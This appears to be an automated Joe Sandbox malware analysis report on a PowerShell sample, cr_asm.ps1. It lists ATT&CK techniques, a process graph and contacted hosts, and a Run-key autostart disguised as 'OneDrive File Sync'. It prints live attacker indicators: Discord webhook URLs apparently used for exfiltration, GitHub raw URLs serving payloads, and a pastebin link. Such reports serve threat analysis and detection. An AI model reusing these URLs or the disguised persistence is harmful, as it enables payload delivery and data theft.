Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
File and Directory Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534101 Sample: cr_asm.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 84 37 pastebin.com 2->37 39 raw.githubusercontent.com 2->39 41 discord.com 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Sigma detected: Suspicious PowerShell Parameter Substring 2->53 55 AI detected suspicious sample 2->55 8 powershell.exe 1 24 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 57 Connects to a pastebin service (likely for C&C) 37->57 process4 dnsIp5 43 discord.com 162.159.138.232, 443, 49736, 49812 CLOUDFLARENETUS United States 8->43 35 C:\ProgramData\...\BeginSync.lnk, MS 8->35 dropped 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->61 63 Suspicious powershell command line found 8->63 65 Tries to open files direct via NTFS file id 8->65 67 Powershell creates an autostart link 8->67 17 conhost.exe 8->17         started        19 attrib.exe 1 8->19         started        21 powershell.exe 7 13->21         started        24 conhost.exe 1 13->24         started        26 powershell.exe 7 15->26         started        28 conhost.exe 1 15->28         started        file6 signatures7 process8 signatures9 59 Suspicious powershell command line found 21->59 30 powershell.exe 14 13 21->30         started        33 powershell.exe 26->33         started        process10 dnsIp11 45 raw.githubusercontent.com 185.199.108.133, 443, 49735, 49737 FASTLYUS Netherlands 30->45 47 pastebin.com 172.67.19.24, 443, 49718, 49724 CLOUDFLARENETUS United States 30->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cr_asm.ps10%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.108.133
    		truetrue
      		unknown
      pastebin.com
      		172.67.19.24
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
          		unknown
          https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              http://pastebin.com/raw/sA04Mwk2false
                		unknown
                https://pastebin.com/raw/sA04Mwk2false
                  		unknown
                  https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2378501269.000001CA46840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://discord.compowershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2336301168.000001CA3850B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD940D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927B00000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000000C.00000002.2577990183.00000149271E3000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNpowershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmp, cr_asm.ps1true
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: safe
                          		unknown
                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000008.00000002.2519977279.0000029CD8B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149271E3000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://go.micropowershell.exe, 00000000.00000002.2336301168.000001CA37725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD8464000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926B56000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              http://www.microsoft.copowershell.exe, 00000000.00000002.2382925415.000001CA4EA80000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://discord.com/powershell.exe, 00000000.00000002.2336301168.000001CA3863B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD9543000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927C36000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://discord.compowershell.exe, 00000000.00000002.2336301168.000001CA385FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD940D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927B00000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmptrue
                                      		unknown
                                      https://discord.com/api/webhooks/128545359042878powershell.exe, 00000008.00000002.2519977279.0000029CD940D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927B00000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://0.discorpowershell.exe, 00000000.00000002.2336301168.000001CA3863B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD9543000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://raw.githubusercontent.compowershell.exe, 00000008.00000002.2519977279.0000029CD8A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927176000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2378501269.000001CA46840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2378501269.000001CA46983000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://raw.githubusercontent.compowershell.exe, 00000008.00000002.2519977279.0000029CD8A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927147000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2336301168.000001CA367D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD7F7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD7FBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149266AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dllpowershell.exe, 00000000.00000002.2336301168.000001CA369F4000.00000004.00000800.00020000.00000000.sdmp, cr_asm.ps1true
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2336301168.000001CA367D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD7F7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926666000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://0.discord.com/powershell.exe, 00000000.00000002.2336301168.000001CA3863B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD9543000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014927C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://pastebin.compowershell.exe, 00000008.00000002.2519977279.0000029CD8464000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD89B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519977279.0000029CD89D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.0000014926B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://pastebin.compowershell.exe, 00000008.00000002.2519977279.0000029CD89B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2577990183.00000149270B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      172.67.19.24
                                                      		pastebin.comUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      162.159.138.232
                                                      		discord.comUnited States
                                                      		13335CLOUDFLARENETUStrue
                                                      185.199.108.133
                                                      		raw.githubusercontent.comNetherlands
                                                      		54113FASTLYUStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1534101
                                                      Start date and time:2024-10-15 15:51:10 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 5m 22s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:cr_asm.ps1
                                                      Detection:MAL
                                                      Classification:mal84.troj.evad.winPS1@16/15@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 74%
                                                      • Number of executed functions: 16
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .ps1

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 4144 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • VT rate limit hit for: cr_asm.ps1

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      09:52:08API Interceptor370x Sleep call for process: powershell.exe modified
                                                      15:52:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                      15:52:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      172.67.19.24envifa.vbsGet hashmaliciousUnknownBrowse
                                                      • pastebin.com/raw/V9y5Q5vv
                                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                                      • pastebin.com/raw/V9y5Q5vv
                                                      Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                      • pastebin.com/raw/NsQ5qTHr
                                                      Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                      • pastebin.com/raw/NsQ5qTHr
                                                      Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                      • pastebin.com/raw/NsQ5qTHr
                                                      PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                      • pastebin.com/raw/NsQ5qTHr
                                                      162.159.138.232SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                        SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                          Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                              http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                https://hkdiscord.antsoon.com/Get hashmaliciousUnknownBrowse
                                                                  RebelCracked.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                    lol.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                      ExtremeInjectorV3.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                        rnZ46.scr.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                          185.199.108.133na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                            oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                              oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                Upit 220062.xlsGet hashmaliciousRemcosBrowse
                                                                                  https://www.mycimalive.com/Get hashmaliciousUnknownBrowse
                                                                                    037002451082_10142024.xlsGet hashmaliciousRemcosBrowse
                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exeGet hashmaliciousUnknownBrowse
                                                                                        20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                                                                                            Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              discord.comQ1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.135.232
                                                                                              Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.136.232
                                                                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                              • 162.159.137.232
                                                                                              0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                              • 162.159.136.232
                                                                                              cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                                              • 162.159.128.233
                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.138.232
                                                                                              SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 162.159.138.232
                                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.136.232
                                                                                              SecuriteInfo.com.Win64.Evo-gen.30154.6249.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.135.232
                                                                                              WCA-Cooperative-Agreement.docx.exeGet hashmaliciousBabadeda, Exela Stealer, Python Stealer, Waltuhium GrabberBrowse
                                                                                              • 162.159.137.232
                                                                                              pastebin.comxc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • 172.67.19.24
                                                                                              w0QdNGUNtd.exeGet hashmaliciousRedLineBrowse
                                                                                              • 104.20.3.235
                                                                                              DHL_Shipping_Invoices_Awb_0000000.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 104.20.3.235
                                                                                              SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                                                                                              • 104.20.4.235
                                                                                              SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                              • 104.20.4.235
                                                                                              SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.19.24
                                                                                              SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.20.3.235
                                                                                              8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                              • 172.67.19.24
                                                                                              80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • 104.20.4.235
                                                                                              jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                              • 172.67.19.24
                                                                                              raw.githubusercontent.comna.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 185.199.109.133
                                                                                              na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                              • 185.199.108.133
                                                                                              oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                              • 185.199.108.133
                                                                                              oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                              • 185.199.108.133
                                                                                              New PO-RFQ13101.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                              • 185.199.110.133
                                                                                              Upit 220062.xlsGet hashmaliciousRemcosBrowse
                                                                                              • 185.199.108.133
                                                                                              Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 185.199.111.133
                                                                                              Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                                              • 185.199.111.133
                                                                                              Purchase Order.jsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 185.199.109.133
                                                                                              segura.vbsGet hashmaliciousAsyncRATBrowse
                                                                                              • 185.199.111.133

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSHqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.27.206.92
                                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                              • 162.159.134.42
                                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.90.114
                                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                              • 188.114.96.3
                                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              • 188.114.97.3
                                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.12.205
                                                                                              CLOUDFLARENETUSHqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.27.206.92
                                                                                              https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                              • 162.159.134.42
                                                                                              https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 1.1.1.1
                                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.90.114
                                                                                              ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                              • 188.114.96.3
                                                                                              order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              • 188.114.97.3
                                                                                              https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 104.26.12.205
                                                                                              FASTLYUShttps://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 151.101.1.229
                                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 185.199.109.133
                                                                                              na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                              • 185.199.108.133
                                                                                              ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              Payment(Ssalazar)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.65.229
                                                                                              RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.2.132
                                                                                              V6QED2Q1WBYVOPEGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.67.6
                                                                                              https://www.brstejtv.com/wsxGet hashmaliciousUnknownBrowse
                                                                                              • 151.101.193.229
                                                                                              https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                              • 151.101.65.229
                                                                                              oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                              • 185.199.108.133

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 185.199.108.133
                                                                                              • 172.67.19.24
                                                                                              • 162.159.138.232
